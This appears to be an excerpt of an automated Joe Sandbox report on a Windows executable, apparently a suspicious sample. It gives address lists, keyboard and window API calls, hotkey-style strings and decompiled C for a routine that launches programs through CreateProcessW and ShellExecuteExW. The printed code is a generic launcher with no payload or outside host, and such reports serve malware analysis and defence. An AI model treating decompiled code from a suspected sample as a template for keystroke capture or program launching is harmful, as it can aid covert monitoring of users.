0x00414ef9
0x00414efc
0x00414efd
0x00414f00
0x00414f01
0x00414f02
0x00414f03
0x00414f04
0x00414f06
0x00414f06
0x00414f09
0x00414f0e
0x00000000
0x00414f0e
0x00414a1e
0x00414a21
0x00000000
0x00000000
0x00414a27
0x00414a2c
0x00414a2f
0x00414a98
0x00414a9c
0x00414a9f
0x00414aa2
0x00414aa6
0x00414aa9
0x00414aad
0x00414ab5
0x00414ab8
0x00414aba
0x00414cc1
0x00414cc4
0x00414cc7
0x00414cca
0x00414d39
0x00414d3c
0x00414d3c
0x00414d3f
0x00000000
0x00000000
0x00414d4d
0x00414d55
0x00414d57
0x00000000
0x00000000
0x00414d64
0x00414d6c
0x00414d71
0x00414d9f
0x00414da2
0x00414da2
0x00414d73
0x00414d73
0x00414d7a
0x00414d7d
0x00414d83
0x00414d85
0x00414d91
0x00414d97
0x00414d9a
0x00414d9a
0x00414da4
0x00414da6
0x00414dd1
0x00414dd8
0x00414dfe
0x00414e02
0x00414e08
0x00414e0c
0x00414e14
0x00414e17
0x00414dda
0x00414dda
0x00414dde
0x00414de2
0x00414dea
0x00414ded
0x00414df0
0x00414df2
0x00414df7
0x00414ded
0x00414da8
0x00414da8
0x00414dab
0x00414dba
0x00414dbc
0x00414dbf
0x00414dc3
0x00414dcd
0x00414dcd
0x00414dbf
0x00414e1c
0x00414e23
0x00414e42
0x00414e4b
0x00414e50
0x00414e56
0x00414e25
0x00414e25
0x00414e2f
0x00414e34
0x00414e3a
0x00414e3a
0x00000000
0x00414e23
0x00414cd4
0x00414cd9
0x00414cdf
0x00414ce1
0x00000000
0x00000000
0x00414ce3
0x00414ce5
0x00000000
0x00000000
0x00414ce7
0x00414ce7
0x00414cef
0x00414cf1
0x00414cf6
0x00414cfd
0x00414d1c
0x00414d26
0x00414d2b
0x00414d31
0x00414cff
0x00414cff
0x00414d09
0x00414d0e
0x00414d14
0x00414d14
0x00000000
0x00414cfd
0x00414ac0
0x00414ac3
0x00414ac5
0x00414ac7
0x00414aca
0x00414ad1
0x00414acc
0x00414acc
0x00414acc
0x00414aca
0x00414ad6
0x00414add
0x00414ae9
0x00414af0
0x00414afc
0x00414b07
0x00414b0b
0x00414b0d
0x00414b12
0x00414b15
0x00414b17
0x00414b17
0x00414b20
0x00414b22
0x00414b27
0x00414b2a
0x00414b2c
0x00414b2c
0x00414b2c
0x00414b2c
0x00414b35
0x00414b37
0x00414b3c
0x00414b3f
0x00414b41
0x00414b41
0x00414b41
0x00414b41
0x00414b4a
0x00414b4c
0x00414b51
0x00414b54
0x00414b56
0x00414b56
0x00414b56
0x00414b56
0x00414b5f
0x00414b61
0x00414b66
0x00414b69
0x00414b6b
0x00414b6b
0x00414b6b
0x00414b6b
0x00414b74
0x00414b76
0x00414b7b
0x00414b7e
0x00414b80
0x00414b80
0x00414b80
0x00414b80
0x00414b86
0x00414b88
0x00414b8d
0x00414b90
0x00414b92
0x00414b92
0x00414b92
0x00414b92
0x00414b98
0x00414b9a
0x00414b9f
0x00414ba2
0x00414ba4
0x00414ba4
0x00414ba4
0x00414ba4
0x00414ba8
0x00414baf
0x00414bb4
0x00414bb6
0x00414bb6
0x00414bbc
0x00414bbe
0x00414bc4
0x00414bc6
0x00414bc8
0x00414bce
0x00414bd4
0x00414bd6
0x00414bd8
0x00414bde
0x00414be3
0x00414be8
0x00414bed
0x00414bef
0x00414bf1
0x00414bf4
0x00414bf6
0x00414bf6
0x00414bf4
0x00414bef
0x00414bbc
0x00414c00
0x00414af2
0x00414af2
0x00414af2
0x00414adf
0x00414adf
0x00414adf
0x00414c04
0x00414c0e
0x00414c13
0x00414c18
0x00414c1e
0x00414c20
0x00000000
0x00414c26
0x00414c26
0x00414c29
0x00414c30
0x00414c30
0x00414c33
0x00414c42
0x00414c4a
0x00414c51
0x00414c53
0x00414c59
0x00414c5b
0x00414c61
0x00414c67
0x00414c6d
0x00414c77
0x00414c7e
0x00414c84
0x00414c86
0x00414c88
0x00414c8a
0x00414c8c
0x00414c96
0x00414c9b
0x00414c9e
0x00414c9e
0x00414caa
0x00414caa
0x00414c6d
0x00414caf
0x00414caf
0x00414caf
0x00414cb6
0x00414cb9
0x00000000
0x00414cb9
0x00414c20
0x00414a31
0x00414a34
0x00000000
0x00000000
0x00414a3a
0x00414a3e
0x00414a79
0x00414a7b
0x00414a7e
0x00414a82
0x00414a85
0x00414a8a
0x00414a90
0x00000000
0x00414a90
0x00414a40
0x00414a42
0x00000000
0x00000000
0x00414a48
0x00414a50
0x00414a50
0x00414a53
0x00414a5f
0x00414a65
0x00414a65
0x00414a65
0x00414a68
0x00414a6b
0x00414a6b
0x00000000
0x00414a0a
0x004148eb
0x004148eb
0x004148ee
0x004148f3
0x004148f5
0x00000000
0x00000000
0x004148fb
0x004148fe
0x00414905
0x00000000
0x00414905
0x004148c5
0x004148c8
0x004148cf
0x00000000
0x004148cf
0x00414825
0x00414829
0x0041482c
0x00414830
0x00414834
0x00414838
0x0041483c
0x00414840
0x00414840
0x00414848
0x0041484d
0x00414852
0x00414855
0x0041485b
0x0041485e
0x0041488c
0x0041488f
0x00414892
0x00414893
0x00414896
0x00414897
0x0041489a
0x0041489b
0x0041489e
0x0041489f
0x004148a2
0x004148a4
0x004148a5
0x004148a8
0x004148a9
0x004148ab
0x00000000
0x004148ab
0x00414860
0x00414863
0x0041486f
0x00414873
0x00414879
0x0041487e
0x00414884
0x00000000
0x00414884
0x0041478b
0x0041478f
0x00414792
0x00414795
0x004147a3
0x004147a6
0x004147b1
0x004147b1
0x004147ba
0x004147c2
0x004147ca
0x004147cc
0x004147e6
0x004147e9
0x004147f1
0x004147f4
0x004147f6
0x00000000
0x00000000
0x004147fc
0x004147fc
0x004147ff
0x00414804
0x00000000
0x00414804
0x004147d6
0x004147de
0x004147e0
0x00000000
0x00000000
0x00000000
0x004147e0
0x004147a8
0x004147ab
0x00000000
0x00000000
0x00000000
0x00414797
0x00414797
0x0041479a
0x00414807
0x00414807
0x0041480a
0x00000000
0x0041480a
0x00000000
0x00000000
0x00000000
0x00415001
0x00415004
0x00415007
0x0041500a
0x0041500e
0x00415011
0x00415011
0x00000000
0x00414650
0x0041463e
0x00414604
0x004142ff
0x0041425f
0x00414267
0x0041426c
0x00414271
0x00414273
0x0041427a
0x00414280
0x00414280
0x00000000
0x00414271
0x00414239
0x0041423e
0x00414243
0x00000000
0x00414245
0x00414245
0x00414248
0x0041424f
0x00000000
0x0041424f

APIs

__wcsnicmp.LIBCMT ref: 00414239
__wcsnicmp.LIBCMT ref: 00414267
GetWindowThreadProcessId.USER32(?,00000000), ref: 0041430A
AttachThreadInput.USER32(?,00000000,00000001), ref: 00414337
GetKeyboardLayout.USER32(00000000), ref: 00414349
GetTickCount.KERNEL32 ref: 004143B2
GetCurrentThreadId.KERNEL32 ref: 004143F4
GetAsyncKeyState.USER32(0000005B), ref: 0041442C
GetAsyncKeyState.USER32(0000005C), ref: 0041443A
GetForegroundWindow.USER32 ref: 004144A5
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004144BD
GetGUIThreadInfo.USER32(00000000,?), ref: 004144D3
GetWindowThreadProcessId.USER32(?,00000000), ref: 004144F2

Strings

Click, xrefs: 0041480F
0, xrefs: 004144C9
wM, xrefs: 00415239
Raw, xrefs: 004148B3
Temp, xrefs: 0041497C
{Text}, xrefs: 00414261
ASC , xrefs: 00414CCE
@, xrefs: 00414749
@, xrefs: 004151EE
{Blind}, xrefs: 00414233
Text, xrefs: 004148D9
wM, xrefs: 00414BDE
^+!#{}, xrefs: 004146CB
Down, xrefs: 004147BC, 00414965
{Click, xrefs: 004142B2

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Thread$Window$Process$AsyncState__wcsnicmp$AttachCountCurrentForegroundInfoInputKeyboardLayoutTick
String ID: wM$ wM$0$@$@$ASC $Click$Down$Raw$Temp$Text$^+!#{}${Blind}${Click${Text}
API String ID: 3979433142-914046546
Opcode ID: d6d30fab38dcc3b17f4f972f183d2056237e5c998afb61cdebfd1e1c6378937a
Instruction ID: 17e216b04407a5ff988624e3f61f6a7b4d122c4192fbe0c9e849f42d3822713d
Opcode Fuzzy Hash: d6d30fab38dcc3b17f4f972f183d2056237e5c998afb61cdebfd1e1c6378937a
Instruction Fuzzy Hash: 62B22971A04244ABDB10DFA4DC41BEF7FB5AF85304F14406BE944AB381E7789985CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 0043A5E0, Relevance: 86.4, APIs: 31, Strings: 18, Instructions: 610
processlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0043A5E0(signed short* __edx, void* __fp0, intOrPtr _a4, intOrPtr* _a8, WCHAR* _a12, char _a16, short* _a20, intOrPtr* _a24, char _a28, intOrPtr _a32, long _a35, intOrPtr _a36) {
				char _v9;
				WCHAR* _v16;
				signed short* _v20;
				WCHAR* _v24;
				void** _v28;
				signed int _v32;
				long _v36;
				struct _PROCESS_INFORMATION _v52;
				char _v56;
				struct _SHELLEXECUTEINFOW _v116;
				struct _STARTUPINFOW _v192;
				char _v448;
				short _v1472;
				char _v5568;
				void* _v5584;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t151;
				void* _t154;
				intOrPtr* _t155;
				signed int _t157;
				WCHAR* _t161;
				WCHAR* _t164;
				WCHAR* _t167;
				short* _t174;
				signed short* _t175;
				_Unknown_base(*)()* _t179;
				void* _t181;
				intOrPtr _t183;
				signed short* _t189;
				WCHAR* _t190;
				WCHAR** _t193;
				WCHAR* _t194;
				void* _t203;
				short* _t205;
				short* _t206;
				void* _t207;
				intOrPtr* _t210;
				short _t211;
				intOrPtr* _t213;
				signed short* _t217;
				void* _t221;
				intOrPtr _t222;
				void* _t227;
				intOrPtr _t236;
				intOrPtr _t237;
				void* _t249;
				void* _t250;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t254;
				void* _t255;
				void* _t256;
				void* _t257;
				void* _t258;
				void* _t259;
				void* _t260;
				intOrPtr* _t262;
				long _t264;
				WCHAR* _t265;
				short* _t266;
				WCHAR* _t269;
				signed short* _t270;
				intOrPtr _t271;
				intOrPtr _t272;
				short _t273;
				short _t274;
				WCHAR* _t275;
				void* _t281;
				signed int _t283;
				signed int _t287;
				intOrPtr _t293;
				WCHAR* _t298;
				void* _t299;
				short* _t301;
				short* _t302;
				intOrPtr _t304;
				intOrPtr _t307;
				void* _t309;
				void* _t314;
				void* _t320;
				signed short* _t322;
				WCHAR* _t323;
				char* _t324;
				WCHAR* _t326;
				WCHAR* _t327;
				intOrPtr _t328;
				WCHAR* _t329;
				signed short* _t332;
				short* _t333;
				void* _t336;
				WCHAR* _t337;
				void* _t367;

				_t367 = __fp0;
				E004A6C70(0x15c0);
				_t151 = _a24;
				_t271 = _a36;
				_t262 = _a12;
				_t327 = _a8;
				_t322 = __edx;
				_t298 = 0;
				if(_t151 == 0) {
					_t151 =  &_v56;
				}
				_v28 = _t151;
				 *_t151 = _t298;
				if(_t271 != _t298) {
					E00419D20(_t271, _t322, _t367);
					_t298 = 0;
				}
				if(_t322 == _t298 ||  *_t322 == _t298) {
					L72:
					return 1;
				} else {
					if(_t262 != _t298 &&  *_t262 == _t298) {
						_a12 = _t298;
					}
					_v20 = _t298;
					_v24 = _t322;
					_v16 = _t298;
					if(_t327 == _t298) {
						_t154 = E004052FA(_t322, L" \t");
						if(_t154 != 0) {
							_t336 = (_t154 - _t322 >> 1) + (_t154 - _t322 >> 1);
							_t15 = _t336 + 2; // 0x2
							E004A6280(_t15);
							_t270 = E004A2210(_t337, _t322, _t336);
							_t337 =  &(_t337[6]);
							 *((short*)(_t336 + _t270)) = 0;
							if( *_t270 != 0x2a) {
								_t249 = E00498079(_t322, _t270, L"find");
								_t337 =  &(_t337[4]);
								if(_t249 == 0) {
									goto L27;
								} else {
									_t250 = E00498079(_t322, _t270, L"explore");
									_t337 =  &(_t337[4]);
									if(_t250 == 0) {
										goto L27;
									} else {
										_t251 = E00498079(_t322, _t270, L"open");
										_t337 =  &(_t337[4]);
										if(_t251 == 0) {
											goto L27;
										} else {
											_t252 = E00498079(_t322, _t270, L"edit");
											_t337 =  &(_t337[4]);
											if(_t252 == 0) {
												goto L27;
											} else {
												_t253 = E00498079(_t322, _t270, L"print");
												_t337 =  &(_t337[4]);
												if(_t253 == 0) {
													goto L27;
												} else {
													_t254 = E00498079(_t322, _t270, L"properties");
													_t337 =  &(_t337[4]);
													if(_t254 == 0) {
														goto L27;
													}
												}
											}
										}
									}
								}
							} else {
								_t270 = _t270 + 2;
								L27:
								_v20 = _t270;
								if(_t270 != 0) {
									_t19 =  &(_t322[1]); // 0x2
									_v24 = _t336 + _t19;
								}
							}
						}
					} else {
						_t255 = E00498079(_t322, _t322, L"find");
						_t337 =  &(_t337[4]);
						if(_t255 == 0) {
							L17:
							_v20 = _t322;
							_v24 = _t327;
						} else {
							_t256 = E00498079(_t322, _t322, L"explore");
							_t337 =  &(_t337[4]);
							if(_t256 == 0) {
								goto L17;
							} else {
								_t257 = E00498079(_t322, _t322, L"open");
								_t337 =  &(_t337[4]);
								if(_t257 == 0) {
									goto L17;
								} else {
									_t258 = E00498079(_t322, _t322, L"edit");
									_t337 =  &(_t337[4]);
									if(_t258 == 0) {
										goto L17;
									} else {
										_t259 = E00498079(_t322, _t322, L"print");
										_t337 =  &(_t337[4]);
										if(_t259 == 0) {
											goto L17;
										} else {
											_t260 = E00498079(_t322, _t322, L"properties");
											_t337 =  &(_t337[4]);
											if(_t260 == 0) {
												goto L17;
											} else {
												_v16 = _t327;
											}
										}
									}
								}
							}
						}
					}
					_t328 = _a4;
					_t264 = 0;
					_v9 = 0;
					_v36 = 0;
					if(_a32 == 0) {
						L39:
						_a35 = _t264;
						goto L40;
					} else {
						_t236 =  *((intOrPtr*)(_t328 + 0xb0c));
						if(_t236 == 0 ||  *((intOrPtr*)(_t236 + 8)) == 0) {
							_t237 =  *((intOrPtr*)(_t328 + 0xb18));
							if(_t237 == 0 ||  *((intOrPtr*)(_t237 + 8)) == _t264) {
								_t29 = _t328 + 0xb20; // 0xb20
								if(E0043AD20(_t29) != 0) {
									goto L39;
								} else {
									goto L35;
								}
							} else {
								goto L35;
							}
						} else {
							L35:
							_a35 = 1;
							if(_v20 == _t264) {
								L40:
								_t155 = _v24;
								_t299 = _t155 + 2;
								do {
									_t272 =  *_t155;
									_t155 = _t155 + 2;
								} while (_t272 != 0);
								_t157 = _t155 - _t299 >> 1;
								_v32 = _t157;
								if(_t157 < 0x4001) {
									if(_v20 != _t264) {
										L76:
										if(_a35 != 0) {
											goto L121;
										} else {
											goto L77;
										}
									} else {
										E004A2D60( &(_v192.lpReserved), 0, 0x40);
										_t210 = _a20;
										_t337 =  &(_t337[6]);
										_v192.cb = 0x44;
										_v192.dwFlags = 1;
										if(_t210 == 0 ||  *_t210 == _t264) {
											_t211 = 1;
										} else {
											_t211 = E0041C9D0(_t210);
										}
										_v192.wShowWindow = _t211;
										_v52.hThread = 0;
										_v52.dwProcessId = 0;
										_v52.dwThreadId = 0;
										_t213 = _a8;
										_v52.hProcess = _t264;
										if(_t213 == 0 ||  *_t213 == _t264) {
											E004A6280(_v32 + _v32 + 2);
											_t269 = _t337;
											_t217 = _t322;
											_t314 = _t269 - _t322;
											do {
												_t287 =  *_t217 & 0x0000ffff;
												 *(_t217 + _t314) = _t287;
												_t217 =  &(_t217[1]);
											} while (_t287 != 0);
										} else {
											_t51 = _t213 + 2; // 0x2
											_t320 = _t51;
											do {
												_t293 =  *_t213;
												_t213 = _t213 + 2;
											} while (_t293 != 0);
											E004A6280((_t213 - _t320 >> 1) + _v32 + (_t213 - _t320 >> 1) + _v32 + 0x14);
											_t269 = _t337;
											_push(_a8);
											E00498B83(_a8, _t269, L"%s %s", _t322);
											_t337 =  &(_t337[8]);
										}
										if(_a35 == 0) {
											if(CreateProcessW(0, _t269, 0, 0, 0, 0, 0, _a12,  &_v192,  &_v52) == 0) {
												GetLastError();
												L77:
												E004A2D60( &(_v116.fMask), 0, 0x38);
												_t174 = _a20;
												_t337 =  &(_t337[6]);
												_v116.cbSize = 0x3c;
												_v116.fMask = 0x440;
												_v116.lpDirectory = _a12;
												if(_t174 == 0 ||  *_t174 == 0) {
													_v116.nShow = 1;
												} else {
													_v116.nShow = E0041C9D0(_t174);
												}
												_t175 = _v20;
												if(_t175 != 0) {
													_v116.lpVerb = _t175;
													_t207 = E00498079(_t322, _t175, L"properties");
													_t337 =  &(_t337[4]);
													if(_t207 == 0) {
														_v116.fMask = _v116.fMask | 0x0000000c;
													}
												}
												if(_v16 == 0) {
													E004A6280(_v32 + _v32 + 2);
													_t189 = _v24;
													_t326 = _t337;
													_t309 = _t326 - _t189;
													do {
														_t283 =  *_t189 & 0x0000ffff;
														 *(_t189 + _t309) = _t283;
														_t189 =  &(_t189[1]);
													} while (_t283 != 0);
													if( *_t326 != 0x22) {
														L92:
														_t190 = _a12;
														if(_t190 != 0) {
															SetCurrentDirectoryW(_t190);
														}
														_t266 = E00499009( &(_t326[1]), 0x20);
														_t337 =  &(_t337[4]);
														while(_t266 != 0) {
															_t112 = _t266 - 2; // -2
															_t332 = _t112;
															if(_t332 > _t326) {
																while(1) {
																	_t203 = E00499009(L"\\/.",  *_t332 & 0x0000ffff);
																	_t337 =  &(_t337[4]);
																	if(_t203 != 0) {
																		goto L99;
																	}
																	_t332 = _t332 - 2;
																	if(_t332 > _t326) {
																		continue;
																	}
																	goto L99;
																}
															}
															L99:
															if( *_t332 != 0x2e) {
																goto L104;
															} else {
																 *_t266 = 0;
																if((_t266 - _t332 & 0xfffffffe) != 8 || E0047E9B0(_t332, L".exe.bat.com.cmd.hta") == 0) {
																	if((GetFileAttributesW(_t326) & 0x00000010) == 0) {
																		goto L106;
																	} else {
																		 *_t266 = 0x20;
																		goto L104;
																	}
																} else {
																	L106:
																	_v24 = _t326;
																	_v16 = _t266 + 2;
																}
															}
															goto L107;
															L104:
															_t266 = E00499009(_t266 + 2, 0x20);
															_t337 =  &(_t337[4]);
														}
														L107:
														if(_a12 != 0) {
															_t193 =  *0x4d4d24; // 0x3211b68
															if(_t193 == 0) {
																L110:
																_t194 = 0x4ae8f8;
															} else {
																_t194 =  *_t193;
																if(_t194 == 0) {
																	goto L110;
																}
															}
															SetCurrentDirectoryW(_t194);
														}
													} else {
														_t333 =  &(_t326[1]);
														_t205 = E00499009(_t333, 0x22);
														_t337 =  &(_t337[4]);
														if(_t205 == 0) {
															goto L92;
														} else {
															 *_t205 = 0;
															_t206 = _t205 + 2;
															_v24 = _t333;
															if( *_t206 != 0) {
																_v16 = _t206;
																if( *_t206 == 0x20) {
																	_v16 =  &(_v16[1]);
																}
															}
														}
													}
												}
												_v116.lpFile = _v24;
												_v116.lpParameters = _v16;
												if(ShellExecuteExW( &_v116) == 0) {
													_t264 = GetLastError();
													L121:
													if(_a28 != 0) {
														_t304 =  *0x4d3b04; // 0x3215110
														 *(_t304 + 0x30) = _t264;
													}
													if(_a16 != 0) {
														FormatMessageW(0x1200, 0, _t264, 0,  &_v1472, 0x1ff, 0);
														if(_v20 == 0) {
															_v448 = 0;
														} else {
															E0047E600( &_v448, 0x80, L"\nVerb: <%s>", _v20);
															_t337 =  &(_t337[4]);
														}
														_t329 = 0x4ae8f8;
														if(_v16 == 0) {
															_v16 = 0x4ae8f8;
														}
														_t265 = _v16;
														_t161 = _t265;
														_t140 =  &(_t161[1]); // 0x2
														_t301 = _t140;
														do {
															_t273 =  *_t161;
															_t161 =  &(_t161[1]);
														} while (_t273 != 0);
														if(_t161 - _t301 >> 1 > 0x190) {
															_t329 = L"...";
														}
														_t323 = _v24;
														_t164 = _t323;
														_t142 =  &(_t164[1]); // 0x2
														_t302 = _t142;
														do {
															_t274 =  *_t164;
															_t164 =  &(_t164[1]);
														} while (_t274 != 0);
														_t275 = L"...";
														if(_t164 - _t302 >> 1 <= 0x190) {
															_t275 = 0x4ae8f8;
														}
														_t167 = L"Launch Error (possibly related to RunAs):";
														if(_a35 == 0) {
															_t167 = L"Failed attempt to launch program or document:";
														}
														_push(_t329);
														_push(_t265);
														_push( &_v448);
														_push(_t275);
														_push(_t323);
														_t324 =  &_v5568;
														E0047E600(_t324, 0x800, L"%s\nAction: <%-0.400s%s>%s\nParams: <%-0.400s%s>", _t167);
														_push( &_v1472);
														_push(_t324);
														L004398E0(_a4, _t367);
													}
													return 0;
												} else {
													if(( *0x4d9fb8 & 0x00000001) != 0) {
														_t179 =  *0x4d9fb4; // 0x0
													} else {
														 *0x4d9fb8 =  *0x4d9fb8 | 0x00000001;
														_t179 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetProcessId");
														 *0x4d9fb4 = _t179;
													}
													_t281 = _v116.hProcess;
													 *_v28 = _t281;
													if(_t281 == 0 || _a36 == 0 || _t179 == 0) {
														goto L67;
													} else {
														_t183 =  *_t179(_t281);
														_push(_a36);
														goto L66;
													}
												}
											} else {
												_t221 = _v52.hThread;
												if(_t221 != 0) {
													CloseHandle(_t221);
												}
												_t222 = _a36;
												 *_v28 = _v52.hProcess;
												if(_t222 != 0) {
													_push(_t222);
													_t183 = _v52.dwProcessId;
													L66:
													E00401200(_t183);
												}
												goto L67;
											}
										} else {
											_push( &_v36);
											_push(_v28);
											_push( &_v9);
											_push( &_v52);
											_t227 = E0045B0B0(_a16, _a12, _t367, _a4, _t269, _v192.wShowWindow, _a36);
											if(_t227 != 0) {
												if(_v9 != 0) {
													L67:
													if(_a28 != 0) {
														_t307 =  *0x4d3b04; // 0x3215110
														 *(_t307 + 0x30) = 0;
													}
													if(_a24 == 0) {
														_t181 =  *_v28;
														if(_t181 != 0) {
															CloseHandle(_t181);
														}
													}
													goto L72;
												} else {
													_t264 = _v36;
													goto L76;
												}
											} else {
												return _t227;
											}
										}
									}
								} else {
									if(_a16 != _t264) {
										_push(0x4ae8f8);
										_push(L"String too long.");
										L004398E0(_t328, _t367);
									}
									return 0;
								}
							} else {
								if(_a16 != _t264) {
									_push(0x4ae8f8);
									_push(L"System verbs unsupported with RunAs.");
									L004398E0(_t328, _t367);
								}
								return 0;
							}
						}
					}
				}
			}

0x0043a5e0
0x0043a5e8
0x0043a5ed
0x0043a5f0
0x0043a5f4
0x0043a5f8
0x0043a5fc
0x0043a5fe
0x0043a602
0x0043a604
0x0043a604
0x0043a607
0x0043a60a
0x0043a60e
0x0043a610
0x0043a615
0x0043a615
0x0043a619
0x0043a9bc
0x0043a9cd
0x0043a628
0x0043a62a
0x0043a631
0x0043a631
0x0043a634
0x0043a637
0x0043a63a
0x0043a63f
0x0043a6c7
0x0043a6ce
0x0043a6d8
0x0043a6db
0x0043a6de
0x0043a6ed
0x0043a6f1
0x0043a6f4
0x0043a6fc
0x0043a709
0x0043a70e
0x0043a713
0x00000000
0x0043a715
0x0043a71b
0x0043a720
0x0043a725
0x00000000
0x0043a727
0x0043a72d
0x0043a732
0x0043a737
0x00000000
0x0043a739
0x0043a73f
0x0043a744
0x0043a749
0x00000000
0x0043a74b
0x0043a751
0x0043a756
0x0043a75b
0x00000000
0x0043a75d
0x0043a763
0x0043a768
0x0043a76d
0x00000000
0x00000000
0x0043a76d
0x0043a75b
0x0043a749
0x0043a737
0x0043a725
0x0043a6fe
0x0043a6fe
0x0043a76f
0x0043a76f
0x0043a774
0x0043a776
0x0043a77a
0x0043a77a
0x0043a774
0x0043a6fc
0x0043a641
0x0043a647
0x0043a64c
0x0043a651
0x0043a6b5
0x0043a6b5
0x0043a6b8
0x0043a653
0x0043a659
0x0043a65e
0x0043a663
0x00000000
0x0043a665
0x0043a66b
0x0043a670
0x0043a675
0x00000000
0x0043a677
0x0043a67d
0x0043a682
0x0043a687
0x00000000
0x0043a689
0x0043a68f
0x0043a694
0x0043a699
0x00000000
0x0043a69b
0x0043a6a1
0x0043a6a6
0x0043a6ab
0x00000000
0x0043a6ad
0x0043a6ad
0x0043a6ad
0x0043a6ab
0x0043a699
0x0043a687
0x0043a675
0x0043a663
0x0043a651
0x0043a77d
0x0043a780
0x0043a782
0x0043a786
0x0043a78c
0x0043a7eb
0x0043a7eb
0x00000000
0x0043a78e
0x0043a78e
0x0043a796
0x0043a79d
0x0043a7a5
0x0043a7ac
0x0043a7b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0043a7bb
0x0043a7bb
0x0043a7bb
0x0043a7c2
0x0043a7ee
0x0043a7ee
0x0043a7f1
0x0043a7f4
0x0043a7f4
0x0043a7f7
0x0043a7fa
0x0043a801
0x0043a803
0x0043a80b
0x0043a837
0x0043a9e1
0x0043a9e5
0x00000000
0x00000000
0x00000000
0x00000000
0x0043a83d
0x0043a848
0x0043a84d
0x0043a850
0x0043a853
0x0043a85d
0x0043a869
0x0043a879
0x0043a870
0x0043a872
0x0043a872
0x0043a87e
0x0043a887
0x0043a88a
0x0043a88d
0x0043a890
0x0043a893
0x0043a898
0x0043a8db
0x0043a8e0
0x0043a8e4
0x0043a8e6
0x0043a8f0
0x0043a8f0
0x0043a8f3
0x0043a8f7
0x0043a8fa
0x0043a89f
0x0043a89f
0x0043a89f
0x0043a8a2
0x0043a8a2
0x0043a8a5
0x0043a8a8
0x0043a8b8
0x0043a8c0
0x0043a8c2
0x0043a8ca
0x0043a8cf
0x0043a8cf
0x0043a903
0x0043a96b
0x0043a9d0
0x0043a9eb
0x0043a9f3
0x0043a9f8
0x0043a9fe
0x0043aa01
0x0043aa08
0x0043aa0f
0x0043aa14
0x0043aa28
0x0043aa1c
0x0043aa23
0x0043aa23
0x0043aa2f
0x0043aa34
0x0043aa3c
0x0043aa3f
0x0043aa44
0x0043aa49
0x0043aa4b
0x0043aa4b
0x0043aa49
0x0043aa53
0x0043aa60
0x0043aa65
0x0043aa68
0x0043aa6c
0x0043aa70
0x0043aa70
0x0043aa73
0x0043aa77
0x0043aa7a
0x0043aa83
0x0043aac1
0x0043aac1
0x0043aac6
0x0043aac9
0x0043aac9
0x0043aada
0x0043aadc
0x0043aae1
0x0043aae7
0x0043aae7
0x0043aaec
0x0043aaf0
0x0043aaf9
0x0043aafe
0x0043ab03
0x00000000
0x00000000
0x0043ab05
0x0043ab0a
0x00000000
0x00000000
0x00000000
0x0043ab0a
0x0043aaf0
0x0043ab0c
0x0043ab10
0x00000000
0x0043ab12
0x0043ab1b
0x0043ab21
0x0043ab3c
0x00000000
0x0043ab3e
0x0043ab43
0x00000000
0x0043ab43
0x0043ab5c
0x0043ab5c
0x0043ab5f
0x0043ab62
0x0043ab62
0x0043ab21
0x00000000
0x0043ab46
0x0043ab51
0x0043ab53
0x0043ab56
0x0043ab65
0x0043ab69
0x0043ab6b
0x0043ab72
0x0043ab7a
0x0043ab7a
0x0043ab74
0x0043ab74
0x0043ab78
0x00000000
0x00000000
0x0043ab78
0x0043ab80
0x0043ab80
0x0043aa85
0x0043aa85
0x0043aa8b
0x0043aa90
0x0043aa95
0x00000000
0x0043aa97
0x0043aa99
0x0043aa9c
0x0043aa9f
0x0043aaa5
0x0043aaaf
0x0043aab2
0x0043aab8
0x0043aab8
0x0043aab2
0x0043aaa5
0x0043aa95
0x0043aa83
0x0043ab90
0x0043ab93
0x0043ab9e
0x0043ac07
0x0043ac09
0x0043ac0d
0x0043ac0f
0x0043ac15
0x0043ac15
0x0043ac1c
0x0043ac3a
0x0043ac44
0x0043ac66
0x0043ac46
0x0043ac5a
0x0043ac5f
0x0043ac5f
0x0043ac71
0x0043ac76
0x0043ac78
0x0043ac78
0x0043ac7b
0x0043ac7e
0x0043ac80
0x0043ac80
0x0043ac83
0x0043ac83
0x0043ac86
0x0043ac89
0x0043ac97
0x0043ac99
0x0043ac99
0x0043ac9e
0x0043aca1
0x0043aca3
0x0043aca3
0x0043aca6
0x0043aca6
0x0043aca9
0x0043acac
0x0043acb5
0x0043acbf
0x0043acc1
0x0043acc1
0x0043acca
0x0043accf
0x0043acd1
0x0043acd1
0x0043acd6
0x0043acd7
0x0043acde
0x0043acdf
0x0043ace0
0x0043acec
0x0043acf2
0x0043ad00
0x0043ad03
0x0043ad07
0x0043ad07
0x0043ad1a
0x0043aba0
0x0043aba7
0x0043abce
0x0043aba9
0x0043aba9
0x0043abc1
0x0043abc7
0x0043abc7
0x0043abd3
0x0043abd9
0x0043abdd
0x00000000
0x0043abf5
0x0043abf6
0x0043abfb
0x00000000
0x0043abfb
0x0043abdd
0x0043a96d
0x0043a96d
0x0043a972
0x0043a975
0x0043a975
0x0043a97b
0x0043a984
0x0043a988
0x0043a98a
0x0043a98b
0x0043a98e
0x0043a98e
0x0043a98e
0x00000000
0x0043a988
0x0043a905
0x0043a90b
0x0043a90c
0x0043a913
0x0043a91d
0x0043a92b
0x0043a932
0x0043a9dc
0x0043a993
0x0043a997
0x0043a999
0x0043a99f
0x0043a99f
0x0043a9aa
0x0043a9af
0x0043a9b3
0x0043a9b6
0x0043a9b6
0x0043a9b3
0x00000000
0x0043a9de
0x0043a9de
0x00000000
0x0043a9de
0x0043a938
0x0043a944
0x0043a944
0x0043a932
